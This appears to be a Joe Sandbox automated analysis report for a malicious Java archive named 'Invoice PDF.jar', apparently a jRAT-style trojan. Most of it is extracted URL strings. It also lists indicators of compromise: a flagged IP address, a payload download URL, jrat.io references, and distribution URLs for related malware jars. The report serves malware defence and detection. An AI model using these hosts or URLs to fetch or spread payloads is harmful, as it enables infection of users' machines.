                                        http://apache.org/xml/features/internal/parser-settingsjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                          		high
                                          http://apache.org/xml/properties/internal/dtd-scannerl.o8java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                            		high
                                            http://apache.org/xml/features/dom/include-ignorable-whitespacejavaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                              		high
                                              http://xml.org/sax/features//domjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                		high
                                                http://java.sun.com/xml/dom/properties/javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://apache.org/xml/properties/internal/stax-entity-resolverjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://apache.org/xml/properties/dom/current-element-node#java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://xml.org/sax/features/0cojava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://apache.org/xml/features/nonvalidating/load-external-dtdnt:java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://jrat.ioSjava.exe, 0000000A.00000002.592979586.0000000009E5B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://apache.org/xml/features/3javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.oracle.com/feature/use-service-mechanismrg/apjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://apache.org/xml/features/xinclude/fixup-base-urisjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://apache.org/xml/properties/internal/error-reporterjavaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://apache.org/xml/features/internal/tolerate-duplicatesKRjava.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://apache.org/xml/properties/security-managerkjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://apache.org/xml/features/validation/warn-on-duplicate-attdefttp://Djava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://xml.org/sax/properties/(javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://apache.org/xml/properties/internal/document-scannerKSjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://java.sun.com/xml/dom/properties/;java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://apache.org/xml/features/include-commentsjavaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://apache.org/xml/features/scanner/notify-char-refsjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://apache.org/xml/features/warn-on-duplicate-entitydef-node-java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://apache.org/xml/properties/dom/current-element-node9java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://policy.camerfirma.com0javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://apache.org/xml/features/validation/schema/normalized-valueBjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://java.sun.com/xml/stream/properties/ignore-external-dtdjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://apache.org/xml/features/continue-after-fatal-errorjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://apache.org/xml/features/standard-uri-conformantjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://apache.org/xml/properties/internal/document-scannerjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.certplus.com/CRL/class2.crljavaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.590748343.00000000048DE000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://bugreport.sun.com/bugreport/java.exe, 00000002.00000002.333098127.000000000531A000.00000004.00000001.sdmp, java.exe, 00000002.00000002.333182589.000000000A3C4000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592486010.0000000009F91000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592199343.0000000009B8A000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://java.sun.com/xml/dom/properties/cjava.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://java.oracle.com/java.exe, 00000002.00000002.333196283.000000000A3D5000.00000004.00000001.sdmp, java.exe, 00000002.00000002.333114203.0000000005332000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592505653.0000000009F97000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592212742.0000000009B8F000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://xml.org/sax/features/namespace-prefixesnt(java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://apache.org/xml/features/javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://apache.org/xml/features/generate-synthetic-annotationsjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://xml.org/sax/features/allow-dtd-events-after-endDTDjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://cps.chambersign.org/cps/chambersroot.htmljavaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://www.certplus.com/CRL/class3P.crljavaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://apache.org/xml/features/validation/balance-syntax-treesSjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://java.sun.com/xml/stream/properties/reader-in-defined-stateodeIterjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://javax.xml.XMLConstants/property/accessExternalDTD3java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.securetrust.com/STCA.crljavaw.exe, 00000009.00000002.592845354.000000000A0FF000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://apache.org/xml/properties/internal/namespace-binderjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://javax.xml.XMLConstants/property/accessExternalDTD;javaw.exe, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://java.sun.com/dtd/properties.dtdkjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://apache.org/xml/properties/internal/error-reporterSEjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://apache.org/xml/properties/internal/datatype-validator-factorysjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://xml.org/sax/properties/ejava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://apache.org/xml/properties/s/dom/iDjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://xml.org/sax/properties/cjava.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://apache.org/xml/properties/security-managerjavaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://java.sun.com/xml/dom/properties/ancestor-checkjavaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://apache.org/xml/features/standard-uri-conformantZjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://apache.org/xml/features/validation/balance-syntax-trees1javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://apache.org/xml/features/namespace-growthSjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://apache.org/xml/features/create-cdata-nodes3java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://apache.org/xml/features/validation/warn-on-undeclared-elemdefsjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://apache.org/xml/features/allow-java-encodingserRej9java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://apache.org/xml/features/create-cdata-nodes:java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://apache.org/xml/features/validation/warn-on-undeclared-elemdefkjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://ops.com.pa/jre7.zipWwscript.exe, 00000005.00000003.340480526.00000000053F9000.00000004.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://apache.org/xml/features/xincludejavaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://apache.org/xml/properties/internal/xinclude-handler9java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://apache.org/xml/features/validation/schema-full-checkingjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://gG2DwoT3pJewMEBGx6.comjavaw.exe, 00000009.00000002.591762381.0000000004DA5000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.591752460.0000000004DA1000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://javax.xml.XMLConstants/property/javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://java.sun.com/xml/dom/properties/ancestor-checkurrjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://java.sun.com/xml/dom/properties/ancestor-check3Cjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://ops.com.pa/jre7.zipwscript.exe, 00000005.00000002.372915284.00000000006F3000.00000004.00000010.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://java.sun.com/xml/stream/properties/3pjava.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://apache.org/xml/properties/input-buffer-sizesjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://jrat.iojavaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.589242015.0000000004690000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmptrue
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://apache.org/xml/properties/internal/grammar-pooljavaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://javax.xml.XMLConstants/property/accessExternalSchemaDjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://javax.xml.XMLConstants/property/s3javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://java.sun.com/xml/stream/properties/reader-in-defined-statejavaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://apache.org/xml/properties/internal/validator/dtd:javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      107.175.101.209
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		20278NEXEONUStrue

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1
                                                                                                                                                      127.0.0.1

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                      Analysis ID:392877
                                                                                                                                                      Start date:19.04.2021
                                                                                                                                                      Start time:23:31:59
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 13m 35s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:Invoice PDF.jar
                                                                                                                                                      Cookbook file name:defaultwindowsfilecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:40
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • GSI enabled (Java)
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.spyw.expl.evad.winJAR@133/260@0/3
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 52%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .jar
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                      • Created / dropped Files have been reduced to 100
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtWriteFile calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      NEXEONUS0WzJdqE4Rw.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      3cneNhQXLA.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      O3Hv20MLTO.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      3C3QlrM2vJ.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      JVDmOtlXaN.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      EyHBhihBLX.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      9ID7hh46jC.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      EY5QMIrtiV.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      3o1SlAow2W.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      1RQzW0mVpe.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      n7o1W05MC8.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      fzs2RFsIyX.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      rpq7FU7REX.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      MQaT6y2WR1.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      2AkfHL53PG.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      yHofZqHUpA.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      t8gXIfeO1k.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      bJZDQZ7Yup.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      4d4QR5t7LQ.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123
                                                                                                                                                      KGY6KoZer1.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.93.133.123

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dllPO SKP 149684.jarGet hashmaliciousBrowse
                                                                                                                                                        CHEQUE COPY.jarGet hashmaliciousBrowse
                                                                                                                                                          Ramon_w2-1040_PDF.jarGet hashmaliciousBrowse
                                                                                                                                                            Payment.jarGet hashmaliciousBrowse
                                                                                                                                                              POHD512-6 5700.jarGet hashmaliciousBrowse
                                                                                                                                                                PAYMENT SWIFT COPY.jarGet hashmaliciousBrowse
                                                                                                                                                                  box.jarGet hashmaliciousBrowse
                                                                                                                                                                    02_ntfsmgr.jarGet hashmaliciousBrowse
                                                                                                                                                                      Company profile and Purchase Order.jarGet hashmaliciousBrowse
                                                                                                                                                                        0076364_00533MXS2.jarGet hashmaliciousBrowse
                                                                                                                                                                          Order.jarGet hashmaliciousBrowse
                                                                                                                                                                            ORDER.jarGet hashmaliciousBrowse
                                                                                                                                                                              Rejected_Stimulus.jarGet hashmaliciousBrowse
                                                                                                                                                                                COMMUNIQUE2.pdf.jarGet hashmaliciousBrowse
                                                                                                                                                                                  https://margopassadorestylist.com/AT&T/AT&T payment confirmation.pdf.jarGet hashmaliciousBrowse
                                                                                                                                                                                    http://itao.edu.mx/CountrysideEstateseasonsgreetingspdf.jarGet hashmaliciousBrowse
                                                                                                                                                                                      PAYMENT SWIFT.jarGet hashmaliciousBrowse
                                                                                                                                                                                        PAYMENT SWIFT.jarGet hashmaliciousBrowse
                                                                                                                                                                                          https://www.dropbox.com/s/lbf8u07a2eak42i/Orden October.jar?dl=1Get hashmaliciousBrowse
                                                                                                                                                                                            http://zaricer.usa.cc/Paiement/copie.jarGet hashmaliciousBrowse

                                                                                                                                                                                              Created / dropped Files

